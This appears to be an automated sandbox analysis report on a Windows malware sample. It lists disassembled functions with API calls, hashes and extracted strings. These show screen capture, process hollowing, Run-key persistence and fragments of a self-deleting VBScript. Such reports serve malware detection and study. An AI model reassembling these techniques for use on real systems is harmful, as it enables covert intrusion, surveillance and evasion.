                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                              • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                              • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                              • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                              Function 00437DB3 Relevance: .3, Instructions: 345COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                              Function 004381E8 Relevance: .3, Instructions: 341COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                              Function 0043797E Relevance: .3, Instructions: 331COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                              Function 00437566 Relevance: .3, Instructions: 323COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                              Function 0041DBF3 Relevance: .3, Instructions: 277COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                              • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                              • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                              • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                              Function 0043E11C Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                              • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                              • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                              Function 0043DEED Relevance: .2, Instructions: 214COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                              • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                              • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                              • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                              Function 00427C40 Relevance: .2, Instructions: 187COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                              • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                              • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                              • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                              Function 004387F0 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                              Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                              • DeleteDC.GDI32(00000000), ref: 00418F65
                                              • DeleteDC.GDI32(00000000), ref: 00418F68
                                              • DeleteObject.GDI32(00000000), ref: 00418F6B
                                              • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                              • DeleteDC.GDI32(00000000), ref: 00418F9D
                                              • DeleteDC.GDI32(00000000), ref: 00418FA0
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                              • GetCursorInfo.USER32(?), ref: 00418FE2
                                              • GetIconInfo.USER32(?,?), ref: 00418FF8
                                              • DeleteObject.GDI32(?), ref: 00419027
                                              • DeleteObject.GDI32(?), ref: 00419034
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                              • DeleteDC.GDI32(?), ref: 004191B7
                                              • DeleteDC.GDI32(00000000), ref: 004191BA
                                              • DeleteObject.GDI32(00000000), ref: 004191BD
                                              • GlobalFree.KERNEL32(?), ref: 004191C8
                                              • DeleteObject.GDI32(00000000), ref: 0041927C
                                              • GlobalFree.KERNEL32(?), ref: 00419283
                                              • DeleteDC.GDI32(?), ref: 00419293
                                              • DeleteDC.GDI32(00000000), ref: 0041929E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                              • String ID: DISPLAY
                                              • API String ID: 4256916514-865373369
                                              • Opcode ID: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                              • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                              • Opcode Fuzzy Hash: 2247b608c21a3b8abac63767662b5221d2e7e1e487ff91865d3b7fb692dc0e69
                                              • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                              Function 0040D45B Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 282registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                              • ExitProcess.KERNEL32 ref: 0040D80B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: """, 0$")$0C[$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("$xdF$xpF
                                              • API String ID: 1861856835-2250399612
                                              • Opcode ID: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                              • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                              • Opcode Fuzzy Hash: 779bd8c3fa979e6212a70a7ec10a956c9f97f6caeed947a2cb61efc57b251fae
                                              • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                              Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                              • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                              • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                              • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                              • GetLastError.KERNEL32 ref: 004184B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              • API String ID: 4188446516-3035715614
                                              • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                              • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                              • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                              • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                              Function 0040D0D1 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 260registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                              • ExitProcess.KERNEL32 ref: 0040D454
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$0C[$8)[$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xdF$xpF
                                              • API String ID: 3797177996-628613161
                                              • Opcode ID: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                              • Opcode Fuzzy Hash: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                              Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
